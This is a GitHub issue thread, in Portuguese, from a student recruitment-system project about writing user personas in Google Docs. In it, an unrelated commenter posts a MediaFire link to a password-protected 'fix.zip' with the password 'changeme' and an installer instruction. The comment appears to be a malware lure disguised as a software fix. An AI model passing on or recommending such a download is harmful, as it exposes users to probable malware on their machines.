### ISSUE TITLE
Personas

### ISSUE THREAD

**Issue by MuriloFekete** [MuriloFekete/Recruitment-System#3]
Criar um documento usando o Google Docs sobre as personas.
Cada persona deve resumir as características dos usuários alvo do seu sistema.
Cada persona deve ter um ficha com as suas informações.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MuriloFekete** [comment]
Criado 3 Personas para o Projeto.

[Link Personas](https://docs.google.com/document/d/1Oh7dlekGy7QAZXgoVzRk4Wh1fDr49nmUM_4pfBcwKhU/edit?usp=sharing)
